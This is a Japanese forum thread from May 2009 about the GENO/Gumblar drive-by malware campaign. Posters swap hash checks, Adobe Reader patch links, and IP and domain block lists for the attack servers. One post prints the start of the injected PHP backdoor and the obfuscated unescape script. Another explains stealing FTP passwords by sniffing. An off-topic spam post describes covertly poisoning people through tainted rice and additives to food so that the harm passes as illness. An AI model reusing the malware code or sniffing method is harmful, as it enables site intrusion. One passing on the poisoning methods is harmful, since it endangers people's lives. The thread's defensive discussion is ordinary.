09/05/13 05:05:25
感染しているか確認
どうやら感染するとC:\WINDOWS\system32\sqlsodbc.chmが上書きされる様子
これのハッシュ値を確認してみるといいかも
ファイルサイズが大きく違うのでよくわかんなかったらそっちでどうぞ
作成日時や更新日時は環境によってバラバラなのでとりあえず無視してもOK
正常なsqlsodbc.chm
ファイルサイズ:50,727バイト
CRC32:B61C7A80
MD5:F639AFDE02547603A3D3930EE4BF8C12
SHA-1:FBDD32ED13D27E4102621E1067FDF3634F33B2C3
上書きされたsqlsodbc.chmの例(あくまで例でありこの限りではない)
ファイルサイズ:1,323 バイト
CRC32:7585CBB6
MD5:BF7209B9589AD09A25740F6D47D0ADEA
SHA-1:D695F957AA9DEB0E4D92F4546DB3A883B1909008
とりあえずこれチェックして大丈夫なら安心だろ
288:名無しさん@お腹いっぱい。
09/05/13 06:00:22
僕達の感染はこれからだ!
GENO先生の次回作にご期待ください。
289:名無しさん@お腹いっぱい。
09/05/13 06:49:57
げろの名が大きく広まった事件であった
その事件は未だ解決までに至っていない
290:名無しさん@お腹いっぱい。
09/05/13 06:55:06
>>287
sqlsodbc.chmの正常な値はインストールされているSQL ServerやMSDEの
バージョンによって違うよ。
291:名無しさん@お腹いっぱい。
09/05/13 06:58:09
>>287
なんの意味もないチェックだろこれ
292:名無しさん@お腹いっぱい。
09/05/13 07:29:10
URLリンク(www.adobe.com)
Adobe Reader 9.1.1 Update - Multiple Languages 5/12/2009
Adobe Reader 8.1.5 Update - Multiple Languages 5/12/2009
これで安心?かな
293:名無しさん@お腹いっぱい。
09/05/13 07:42:48
>>287
んなアホな。
294:名無しさん@お腹いっぱい。
09/05/13 07:54:33
URLリンク(www.adobe.com)
Adobe Reader 7.1.2 Update - Multiple Languages 5/12/2009
今日仕事、一日中インストールしまくりだな
295:名無しさん@お腹いっぱい。
09/05/13 10:07:22
SayMove!について語るスレ part2
スレリンク(streaming板)
SayMove!について語るスレ part3
スレリンク(streaming板)
ぱらすての次はsaymoveの時代だ!【本スレ】
スレリンク(streaming板)
296:名無しさん@お腹いっぱい。
09/05/13 10:21:31
ウィルス感染してるか調べる明確な方法はないのだろうか
297:名無しさん@お腹いっぱい。
09/05/13 11:07:49
>>292
インストーラは9.1.0のままなので
[ヘルプ][アップデートの有無をチェック]で
9.1.1にしておくこと(とっくに9.1.0の人も)。
298:名無しさん@お腹いっぱい。
09/05/13 11:18:53
>>292のとこアップデートのあるよ
299:名無しさん@お腹いっぱい。
09/05/13 11:33:27
すまん、これのリンク先のこと
URLリンク(www.adobe.com)
300:名無しさん@お腹いっぱい。
09/05/13 12:15:34
Adobe Reader 7/8/9すべて対策が講じられたということでいいのかな?
301:名無しさん@お腹いっぱい。
09/05/13 12:23:36
んだね。もっともパッチ当てない奴が山ほどいそうだが。
302:名無しさん@お腹いっぱい。
09/05/13 12:25:29
進化したGENOウイルスがそれすらいずれ突破してきそうで怖いな
303:名無しさん@お腹いっぱい。
09/05/13 12:33:48
クライアントPCへの侵入経路が今ひとつわからないんだよな。
クライアントPCに対してもWebに仕込まれるのと同様、Adobeの
脆弱性を突かれてるんだろうか。
304:名無しさん@お腹いっぱい。
09/05/13 13:04:10
>>297
「アップデートサーバが応答していません。サーバが一時的にオフラインになっているか
インターネットまたはファイアウォール設定が正しくない場合があります。
後でもう一度やり直してください」
と出るんだがどうしたらいいの?
はぁ、もうこんな生活疲れたよ…
305:名無しさん@お腹いっぱい。
09/05/13 13:04:36
>>294 からパチ拾う。
306:名無しさん@お腹いっぱい。
09/05/13 13:17:06
>>299
だめだ、アクロバットリーダーの7のアップデートがあたんね
くそあどび
307:名無しさん@お腹いっぱい。
09/05/13 13:19:15
糞はお前だ・・・・。
308:名無しさん@お腹いっぱい。
09/05/13 13:49:14
全然おさまらないじゃん、GENOウイルス…
309:名無しさん@お腹いっぱい。
09/05/13 13:56:33
本番はこれからだ!GENOぉぉぉぉぉぉぉぉ!
310:名無しさん@お腹いっぱい。
09/05/13 14:40:31
スイマセン
フラッシュは最新版で
偶然にもアドビリーダー入れてなかったんですが
感染して無いでしょうか
311:名無しさん@お腹いっぱい。
09/05/13 14:46:31
感染してますん
312:名無しさん@お腹いっぱい。
09/05/13 14:46:47
誰かエスパー呼んでこいよ。
313:名無しさん@お腹いっぱい。
09/05/13 14:50:04
好きだと言い出せないうちに あなたのロッカー奪ったラブレター
314:名無しさん@お腹いっぱい。
09/05/13 15:51:18
アンインストールするのが確実
315:名無しさん@お腹いっぱい。
09/05/13 16:26:52
ウイルスのこと何も分からない俺に教えてください・・・
316:名無しさん@お腹いっぱい。
09/05/13 16:27:50
GENOに感染して総再インスコしたんだけど
先にマカフィー入れてからアドビリーダーの最新版を入れようとしたら
バッファーのオーバーフローがどうのセキュリティ面に重大な問題がどうのと警告が出てインストール出来なかった
昨日発表されたパッチがあれば問題なくインストールできるのだろうか…
317:名無しさん@お腹いっぱい。
09/05/13 16:28:37
>>315
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――‐┬┘
|
____.____ | .__
| | | | |\_\
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |
318:名無しさん@お腹いっぱい。
09/05/13 16:28:46
>>315
ホムペ持ってないなら気にする必要なし。
319:名無しさん@お腹いっぱい。
09/05/13 16:29:01
adobe readerは8と9どっちがいいの?
320:名無しさん@お腹いっぱい。
09/05/13 16:38:06
>>316
こっちは、インストできたよ
こんなに大変な事態だとIPブロックをしないといけないなー
XPのファイアーウォールってIPブロックの機能ないんだろうか?
321:名無しさん@お腹いっぱい。
09/05/13 17:29:58
sqlsodbc.chmがないんですが、これは異常なんですか?
OSはVistaです
322:名無しさん@お腹いっぱい。
09/05/13 17:31:43
窓の杜 - 【NEWS】Adobe、4月末に公表済みの深刻な脆弱性を修正した「Adobe Reader」v9.1.1を公開
URLリンク(www.forest.impress.co.jp)
323:名無しさん@お腹いっぱい。
09/05/13 17:36:53
>>321
Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思うよ~
324:名無しさん@お腹いっぱい。
09/05/13 17:38:24
>>318
>>5を見ればわかるけどサイト乗っ取りだけじゃなくゾンビ化するみたいだよ
このへんに出てる
URLリンク(www3.atword.jp)
URLリンク(www3.atword.jp)
325:名無しさん@お腹いっぱい。
09/05/13 17:41:10
>>319
迷う理由がわからないけど特に8を使う理由がなければ
9で良いと思うよ
326:名無しさん@お腹いっぱい。
09/05/13 17:48:09
>>325
いや、特に8を使う理由はないんだけど、9は不具合が多いって
聞いたもんでw
ありがと
327:名無しさん@お腹いっぱい。
09/05/13 18:19:28
>>324
ゾンビ化…
厄介な。
328:名無しさん@お腹いっぱい。
09/05/13 18:33:10
>>323
ありがとうございます
329:名無しさん@お腹いっぱい。
09/05/13 18:35:42
9は開いた文書の数だけウィンドウが開いて、
タスクバーにボタンが作られるのが気に入らない
330:名無しさん@お腹いっぱい。
09/05/13 19:51:41
>申し訳ありません。更新に使っていたPCが、
>通称zlkon・GENOウイルスと呼ばれているウイルスの亜種に感染していたようです。
>以下の時間帯に各ページにアクセスした方は感染の恐れが有ります。
>
>5月12日 午前6時31分~午前8:00頃
>・ニコニコのぞき見検索のトップページ・ランキングページ・再生ページ以外のHTMLページ
>・SayMove!のトップページ
>同日 午前6時31分~正午頃
>・ニコニコのぞき見検索のマイリスト表示ページ
の件だけど、Vid-DLとかを経由で動画落しても、感染するの?
331:名無しさん@お腹いっぱい。
09/05/13 19:55:07
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます?是非ご教授してほしいです
332:名無しさん@お腹いっぱい。
09/05/13 20:03:44
教示
333:名無しさん@お腹いっぱい。
09/05/13 20:06:11
>>332
間違えました><
94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
ってどうやるか判る人居ます?是非ご教示してほしいです
334:名無しさん@お腹いっぱい。
09/05/13 20:10:14
まず服を脱ぎます
335:名無しさん@お腹いっぱい。
09/05/13 20:12:43
>>303
不正なジャバスクリプトを仕込まれたページを閲覧する
ジャバスクリプト起動
アクロバットリーダー、もしくはフラッシュを起動
アクロバットのジャバスクリプト機能を起動
そこから侵入
336:名無しさん@お腹いっぱい。
09/05/13 20:38:31
>>331
ルーターかPG2(ソフト)でブロックしろ。
PG2でのブロックの仕方はリネージュ資料室辺りでも漁ってくれ。説明は面倒だ。
Vistaの場合は、PG2(英文のβ)入れただけじゃ駄目で、ローダー経由で起動しないと
実際の動作しないことにも注意。
337:名無しさん@お腹いっぱい。
09/05/13 20:57:22
うちは日本語化したPG2を常駐させてるなぁ
結構、役に立ってる
338:名無しさん@お腹いっぱい。
09/05/13 20:58:07
>>336
よくわかんないけど・・・情報ありがとう!調べてみる
339:名無しさん@お腹いっぱい。
09/05/13 21:21:58
もしこれ感染したの知らないままホームページ更新してたら
ソースにはなんて記述されてるの?
340:名無しさん@お腹いっぱい。
09/05/13 21:34:49
>>339
参考
<?php
if(!function_exists('tmp_lkojfghx')){
if(isset($_POST['tmp_lkojfghx3']))
以下略
*.jsすべての後ろに、
<!-- document.write(unescape('0F%3COjAsJvcriOjApJvtJv
341:名無しさん@お腹いっぱい。
09/05/13 21:48:32
今回のもラトビアとばされんのか?
342:名無しさん@お腹いっぱい。
09/05/13 21:55:33
>>340
ありがとう
とりあえずトレンドマイクロ オンラインスキャン検出無し
sqlsodbc.chmハッシュ値確認正常
ホームページのソースに怪しい記述なし
pc再起動正常、cmdやregedit正常に起動
安心していいよな…
343:名無しさん@お腹いっぱい。
09/05/13 22:28:58
GENOウイルスって感染するとDドライブとかにも影響出るんでしょうか?
再インストしてカスペルスキーのオンラインスキャンかけたらもう検出はされなかったんですが
申し訳ないのですがどなたか教えていただけないでしょうか
344:名無しさん@お腹いっぱい。
09/05/13 22:50:47
>>343
データのバックアップができるぐらいだから
影響なかったはず
345:名無しさん@お腹いっぱい。
09/05/13 22:53:49
>>344
レス本当にありがとうございます。安心しました
一回再インストールかけたらフォルダの合計は普通なのにHDのプロパティで調べたら
100G以上あったりしてすごく焦りました…
もう一度かけたら直ったのですがウイルス系にかかったのは初めてだったんで
色々と過敏になってしまってました
346:名無しさん@お腹いっぱい。
09/05/13 23:02:47
>>345
ウィルスのほうをバックアップしてなかったら、大丈夫
347:名無しさん@お腹いっぱい。
09/05/13 23:03:05
Macは感染しないよね?
348:名無しさん@お腹いっぱい。
09/05/13 23:08:02
Windows7は感染しないよね?
349:名無しさん@お腹いっぱい。
09/05/13 23:12:59
Vistaなら感染しない
350:345
09/05/13 23:37:32
>>346
あれ…不安になってきました
Dドライブを見て隠し含めてフォルダが無くカスペルスキーで
オンラインチェックして問題なかった場合はまず大丈夫と見て良い…でしょうか?
351:名無しさん@お腹いっぱい。
09/05/13 23:50:52
そろそろちゃんと報道されるかな?
628 シンフィアンドラ・ザンゼグラ(東日本) sage 2009/05/13(水) 23:48:57.86 ID:wuS3Hwtd(3)
小林製薬もGenoウィルスにやられてたのか。
シャレにならん事態だな。
URLリンク(www.kobayashi.co.jp)
クリーンインストールしない限り修復不能で、botnetに組み込まれてしまう
ような厄介な代物なのに、いつまで経ってもまともに報道されないのは
初期感染サイトが隠蔽したってのが大きいんだろうか。
352:名無しさん@お腹いっぱい。
09/05/14 00:28:15
国内の正規サイト改ざん:攻撃サイトを変え再襲来
URLリンク(www.so-net.ne.jp)
国内のWebサイトが次々に改ざんされ、閲覧者にウイルスを感染させようとする
悪質なJavaScriptが埋め込まれる問題が続いている。
ラトビアに設置された攻撃サイトが4月末に閉鎖され、ひと安心と思ったのも束の
間、今度は「gumblar.cn」というドメインにサイトを移して、攻撃を再開
したようだ。中国のドメイン名だが、サイトはロシアでホストされている。
■BIG-server.com
ゼロ(札幌市厚別区)が運営するレンタルサーバーのBIG-server.com(中略)
■ウェルネス
医療情報の提供やマーケッティングを行っているウェルネス(東京都文京区)(中略)
■ホースマンクラブ
インターネットポイントサービスを行っている、へそクリック(横浜市西区)は7日、
ホームページ上に掲載していた広告主で競馬情報の提供を行っているホースマンクラ
ブのサイトが改ざんされ、不正なスクリプトが埋め込まれていたと発表。広告の掲載
を中止(中略)
攻撃サイトが変わり、最初にロードされるJavaScriptファイルまでが頻繁に更新
されている。ウイルス対策ソフトの対応が間に合わないようで、更新直後の検出率
は極めて低いという状態だ。(中略)
353:名無しさん@お腹いっぱい。
09/05/14 00:32:55
ここいらで一旦、一般人がやっておくべき対策をまとめようか
354:名無しさん@お腹いっぱい。
09/05/14 00:33:26
ロシアにいってサーバーを破壊すればいいんでは?
355:名無しさん@お腹いっぱい。
09/05/14 01:00:13
どんな症状がでるの?感染すると?
356:名無しさん@お腹いっぱい。
09/05/14 01:01:45
ロシアンマフィアの構成員になれて逮捕される
357:名無しさん@お腹いっぱい。
09/05/14 01:02:41
全身がもの凄くカユくなる
358:名無しさん@お腹いっぱい。
09/05/14 01:04:44
肩こりがなおる
359:名無しさん@お腹いっぱい。
09/05/14 01:08:19
タミフルで治るって舛添が言ってた。
360:名無しさん@お腹いっぱい。
09/05/14 01:55:38
∧∧
ヽ(・ω・)/ ズコー
\(.\ ノ
、ハ,,、  ̄
 ̄
361:名無しさん@お腹いっぱい。
09/05/14 06:44:32
やっぱり有名どころが感染しないとダメなんだな 色んな意味で
362:名無しさん@お腹いっぱい。
09/05/14 07:09:21
どうやってサイトを改ざんしているかってのに興味ない奴多すぎるし書いても無視されるし
いいよ無視しろよ難しいことからは目をそむけて生きろよ、おまえらは
理解できる奴だけ理解してればいいよ、もう
ftpはパスワードが暗号化されてない
snifferで盗撮すれば簡単に他人のパスワードを盗める
botnet、又は複数のノードを持ってたり複数のプロバイダと契約してたり
いろんな経路でsnifferできる環境にある奴、又は組織なら
いろんなサイトを改ざんできる
さらにいろんな人のメールを盗み見ることも出来る
どのサイトを見たのかという情報も簡単に手に入る
ネットが匿名なんていってる奴は情弱
全裸で外を歩いているようなものだよ
363:名無しさん@お腹いっぱい。
09/05/14 07:19:34
avast先生が俺のPCを御助けくださった・・・
もう感謝するしかねえ
364:名無しさん@お腹いっぱい。
09/05/14 07:21:15
AVAST今回は頑張った
365:名無しさん@お腹いっぱい。
09/05/14 07:22:46
豚インフル並にたいした事なかったなw
366:名無しさん@お腹いっぱい。
09/05/14 07:32:43
>>365
GENO社員乙
367:名無しさん@お腹いっぱい。
09/05/14 08:48:46
>>351
大手企業だから詳細な説明してくれるといいんだが。
368:名無しさん@お腹いっぱい。
09/05/14 09:14:28
Adobe Readerをアンインストールしたよ。
代わりはPDF-XCHANGE VIEWER。
369:名無しさん@お腹いっぱい。
09/05/14 09:15:52
GENOウイルス
370:名無しさん@お腹いっぱい。
09/05/14 10:17:55
unescapeが含まれてたら警告出すとか、そういうのできないの?大体unescape含んでるんでしょ?
371:名無しさん@お腹いっぱい。
09/05/14 10:46:21
maido3.com/server/zousan/index.htmlに変なjsが組み込まれてるけど、
URLリンク(so.7walker.net)
これって感染してる?
372:名無しさん@お腹いっぱい。
09/05/14 10:53:03
直リンしちゃだめでしょ
373:372
09/05/14 10:53:45
ごめんしてなかったか申し訳ない
374:名無しさん@お腹いっぱい。
09/05/14 11:02:10
商標と商号商標登録ホットライン
URLリンク(106hotline.com)
↑
このページにアクセスすると、セキュリティソフト反応しますか?
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・
「JS:Redirector-H2」っていう名前なんですが、GENOウイルスの一種ですか?
375:名無しさん@お腹いっぱい。
09/05/14 11:04:37
ウゼエな
376:名無しさん@お腹いっぱい。
09/05/14 11:05:01
小林製薬もやられた?
URLリンク(www.kobayashi.co.jp)
377:名無しさん@お腹いっぱい。
09/05/14 11:05:07
間違ってクリックしちゃうから工夫して書いて・・・
378:名無しさん@お腹いっぱい。
09/05/14 11:07:20
>>376
>>351
http://とかごっそり削って書き込もうぜw
379:名無しさん@お腹いっぱい。
09/05/14 11:07:20
【小林製薬】一部Webサイトが第3者により改竄、ウイルススキャンのお願いとお詫び[05/12]
スレリンク(owabiplus板)l50
380:名無しさん@お腹いっぱい。
09/05/14 11:08:16
>>374
思いっきりgumblarの文字が!!
381:名無しさん@お腹いっぱい。
09/05/14 11:10:19
>>380
gumblarって何ですか?
382:名無しさん@お腹いっぱい。
09/05/14 11:12:10
Genoって難読化の方法もいくつかパターンがあるんだな。
383:名無しさん@お腹いっぱい。
09/05/14 11:12:59
>>381
gumblarでこのスレを検索
384:名無しさん@お腹いっぱい。
09/05/14 11:14:33
>>383
このスレの書き込みを見たんですが、要するに
「gumblar.cn」ってサイトに接続させるようなスクリプトが
このページに含まれていたってことなんでしょうか?
↓
商標と商号商標登録ホットライン
URLリンク(106hotline.com)
385:名無しさん@お腹いっぱい。
09/05/14 11:16:35
>>384
その通り。gumblar.cnからウィルス本体を送り込まれる。
386:名無しさん@お腹いっぱい。
09/05/14 11:18:48
>>385
なるほど・・・
それで、avastで検出されたウイルス名が「Redirector」だったわけか・・・
つまり、「再接続させる」って意味でしょうね
387:名無しさん@お腹いっぱい。
09/05/14 11:22:12
>>384
なんで>>377、>>378で言われてるのにまだそのままでリンク書いてるんだ?
わざとか?
ウイルスバスタースレでも悪用されてるぞ(本人か?)
スレリンク(sec板:355番)
355 名前:名無しさん@お腹いっぱい。 [] 投稿日:2009/05/14(木) 11:11:51
商標と商号商標登録ホットライン
URLリンク(106hotline.com)
↑
このページにアクセスすると、セキュリティソフト反応しますか?
私はavastを使っているんですが、「トロイ」の一種が検出されたんですが・・・
ウイルスバスターを使っている方はどうですか?
388:名無しさん@お腹いっぱい。
09/05/14 11:23:11
↑ ごめんそのまま貼っちゃった リンク踏まないよう注意してください
389:名無しさん@お腹いっぱい。
09/05/14 11:23:50
なにやってんだかwww
390:名無しさん@お腹いっぱい。
09/05/14 11:24:21
>>388
ちょw
自分で言っておいてw
何をやっているw
391:名無しさん@お腹いっぱい。
09/05/14 11:26:26
専ブラだとttpでもリンクになる場合が多いから危険すぎるな
392:388
09/05/14 11:27:41
申し訳ない orz
393:名無しさん@お腹いっぱい。
09/05/14 11:30:23
>>387-388
ワロタ
394:名無しさん@お腹いっぱい。
09/05/14 11:32:25
ht URLリンク(www.google.com)
こういう風に張ればいいんだよ
395:名無しさん@お腹いっぱい。
09/05/14 11:35:18
http部分いじったって、GreaseMonkeyスクリプトや専ブラで直リンになるしどうだっていいよ
396:名無しさん@お腹いっぱい。
09/05/14 11:39:04
>394
専ブラだとこれでも飛べちゃうんだよな
397:名無しさん@お腹いっぱい。
09/05/14 11:42:52
>>396
そうなんだ。chaikaだと>>394はリンクされない。
398:名無しさん@お腹いっぱい。
09/05/14 11:44:16
他のブラウザは知らんがIEならアドレスバーにコピペすれば
自動的にHTTPの文字が追加されるので
wwwから書けば良い
399:名無しさん@お腹いっぱい。
09/05/14 11:45:18
途中の「test」を「てすと」に代えるとかしないと駄目だね
400:名無しさん@お腹いっぱい。
09/05/14 11:47:15
hxxpでいいんじゃない?
401:名無しさん@お腹いっぱい。
09/05/14 11:49:33
b2rだけど、こういうのってカーソルもってっただけでもヤバイ?
402:名無しさん@お腹いっぱい。
09/05/14 11:51:10
www.example.com ←これをリンクにする専ブラもあるそうだ
ドットを●や■に変えるのをお勧め
403:名無しさん@お腹いっぱい。
09/05/14 11:51:46
URLリンク(www.fourteenforty.jp)
> 近年、Webページを閲覧する事により感染する「Drive-by-Download」マルウエアの問題が深刻化しています。
>Webブラウザやプラグイン、アプリケーションの脆弱性を利用してシステムにインストールされる事例が多発しており
GENOウイルスのことですね。よくわかりました。w
404:名無しさん@お腹いっぱい。
09/05/14 11:54:39
384のはこのスレに貼られる前からあちこちのスレに貼られてるな
405:名無しさん@お腹いっぱい。
09/05/14 11:55:29
↑気づいたのは今だよ
406:名無しさん@お腹いっぱい。
09/05/14 11:57:05
vista使いは丸腰でブラブラしてても良いのかね
407:名無しさん@お腹いっぱい。
09/05/14 12:34:23
>>406
よう俺
最近この話題知ったんだ
一応チェックはしておきたい
408:名無しさん@お腹いっぱい。
09/05/14 12:39:02
逆にこれはホームページを持ってるとわかりやすいってこと?
htmlアップロードすりゃ感染してるかどうかわかるよな?
409:名無しさん@お腹いっぱい。
09/05/14 12:42:05
ラトビア特急、ゆっくりと路線縮小中
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/30(木) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
中々収束しないな orz
410:名無しさん@お腹いっぱい。
09/05/14 12:44:00
違う。
clientとserverの違いを考えろ。
お前はclientだろうが
411:名無しさん@お腹いっぱい。
09/05/14 12:46:01
>>386
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
「俺スルドイこと言った」とか思ってる?
412:名無しさん@お腹いっぱい。
09/05/14 12:47:04
>>409
インフルの感染者を見ているようだ
413:名無しさん@お腹いっぱい。
09/05/14 13:00:30
【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖 閲覧者にはウイルス感染の恐れ [09/05/12]
スレリンク(bizplus板)
414:名無しさん@お腹いっぱい。
09/05/14 13:34:38
>>409
これは延べ数?
415:名無しさん@お腹いっぱい。
09/05/14 13:41:38
汚染米とラジコン
スレリンク(radiocontrol板:337-番)
スレリンク(bouhan板:20-番)
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
URLリンク(www.tk-telefilm.co.jp)
夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
精神的に追詰められる心理サスペンスの傑作!
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
416:名無しさん@お腹いっぱい。
09/05/14 13:46:07
感染の確認方法は?
417:名無しさん@お腹いっぱい。
09/05/14 13:49:33
>>414
延べ数なら減らないだろ
418:名無しさん@お腹いっぱい。
09/05/14 13:50:32
gumblar.cnへの接続を遮断してもダメ?
419:名無しさん@お腹いっぱい。
09/05/14 13:51:28
まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい
もちろんほとんどの人は設定済みリカバリ用意してるだろうけど
420:名無しさん@お腹いっぱい。
09/05/14 13:54:57
gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど
これ大丈夫だよね?
もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ?
421:名無しさん@お腹いっぱい。
09/05/14 13:57:51
〉〉419
感染の真偽はまだわからないが、
リカバリーディスク作ってなかった僕はどうすればいいでしょうか?
422:名無しさん@お腹いっぱい。
09/05/14 13:59:46
>>421
クリーンインストール
423:名無しさん@お腹いっぱい。
09/05/14 14:09:41
プリインストールじゃなければいいけど
424:名無しさん@お腹いっぱい。
09/05/14 14:11:55
>>420
まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた
425:名無しさん@お腹いっぱい。
09/05/14 14:17:54
〉〉423
プリインストールでした本当に(ry
詰んだか?OSはVISTAだけども、、、
後処置法何かある?
426:名無しさん@お腹いっぱい。
09/05/14 14:18:45
すまん、Adobe Acrobatとreaderってどう違う?
プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか?
427:名無しさん@お腹いっぱい。
09/05/14 14:21:39
>>426
Acrobatは有償の製品版。PDF作成機能がある。
428:名無しさん@お腹いっぱい。
09/05/14 14:23:44
>>420>>424
マジか
ヤバすぎるだろaguse
429:名無しさん@お腹いっぱい。
09/05/14 14:23:46
誰か>>304にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・?
430:名無しさん@お腹いっぱい。
09/05/14 14:24:26
>>425
VistaでGenoに感染したのなら、初の例じゃないか?
JavascriptはVer.6以上のWindowsをはねてるし。
431:名無しさん@お腹いっぱい。
09/05/14 14:24:49
read:読む[er]
readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる
あと設定からAdobereaderJavaScriptも切っとけ
432:名無しさん@お腹いっぱい。
09/05/14 14:25:33
URLリンク(www.google.com)
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
URLリンク(www.google.com)
2009/05/03(日) 623 個
2009/05/06(水) 1108 個
2009/05/07(木) 1951 個
2009/05/08(金) 1437 個
2009/05/09(土) 648 個
2009/05/14(木) 24 個のドメインを感染させています。
433:名無しさん@お腹いっぱい。
09/05/14 14:27:10
>>430
そっか。XPでもUAを偽装しておけばGenoを防げるなw
434:名無しさん@お腹いっぱい。
09/05/14 14:27:27
>>420
怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・
435:名無しさん@お腹いっぱい。
09/05/14 14:28:06
>>427>>431
わかった。あり。
436:名無しさん@お腹いっぱい。
09/05/14 14:28:17
>>430
いやまだカスペチェックしてないからワカラン
しかしIEがよく落ちたりするからさ
437:名無しさん@お腹いっぱい。
09/05/14 14:31:44
感染の確認方法おしえろやクズ
438:名無しさん@お腹いっぱい。
09/05/14 14:34:54
>>437
クズに教えを請うなんて恥ずべきことだぞ
439:名無しさん@お腹いっぱい。
09/05/14 14:37:25
再起動して戻ってこれたら感染してない
440:名無しさん@お腹いっぱい。
09/05/14 14:42:22
千葉女どこいっちゃったの
寂しいから出てこいよ
441:名無しさん@お腹いっぱい。
09/05/14 14:44:37
???
442:429
09/05/14 14:44:38
もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので
セキュリティ初心者質問スレに移動してよかですか?
マルチになる?
443:名無しさん@お腹いっぱい。
09/05/14 14:50:32
該当バージョンのアップデートを>>292でDLできないか
444:名無しさん@お腹いっぱい。
09/05/14 15:03:39
>>420
>adblockのgumblar.cnカウントが5になってんだけど
これってフィルタに「gumblar.cn」って入れてるってこと?
445:名無しさん@お腹いっぱい。
09/05/14 15:04:21
>>443
すんません、できました。
騒いで申し訳ないです。
有難うございます。
446:名無しさん@お腹いっぱい。
09/05/14 15:12:41
>>420
「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ
gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと
447:名無しさん@お腹いっぱい。
09/05/14 15:13:50
>>444
>>446
安心した ありがとう
448:445
09/05/14 15:13:52
すみません、もうちょっとだけ質問。
>>297はあまり気にしなくてもOK?
確かにプロパティみると9.1のままだけど。
449:名無しさん@お腹いっぱい。
09/05/14 15:15:39
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
450:名無しさん@お腹いっぱい。
09/05/14 15:16:14
>>449
えっ
451:名無しさん@お腹いっぱい。
09/05/14 15:18:22
>>446
何だaguseのアドレスに反応しただけか!
あー安心したありがとう
452:名無しさん@お腹いっぱい。
09/05/14 15:19:14
>>448
Adobe Reader 9.1.1 Update - Multiple Languagesはやった?
453:名無しさん@お腹いっぱい。
09/05/14 15:19:20
>>450
えっ
454:名無しさん@お腹いっぱい。
09/05/14 15:20:36
>>447
安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな
*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*
455:名無しさん@お腹いっぱい。
09/05/14 15:31:11
>>413
GENOだね
456:名無しさん@お腹いっぱい。
09/05/14 15:31:50
なにそれこわい
457:名無しさん@お腹いっぱい。
09/05/14 15:32:28
>>454
URLリンク(www3.atword.jp)
ここの下のほうの焼却炉ってところにたくさん禁止したほうがいいアドレスあるから使ってみたらどうだい?
だけどabblockよりルーターとかPCのFWに設定しておいたほうよさそう
何か俺が勘違いしていたらごめんね
458:名無しさん@お腹いっぱい。
09/05/14 15:32:33
>>454
URLリンク(web-g.org)
ここ見て*/94.247.[2-3].[0-255]/*は入れたんだけど
*/94.229.[64-65].[0-255]/*も入れた方がいいの?
自分も知りたいから、詳しい人お願いしますm(_ _)m
459:名無しさん@お腹いっぱい。
09/05/14 15:32:33
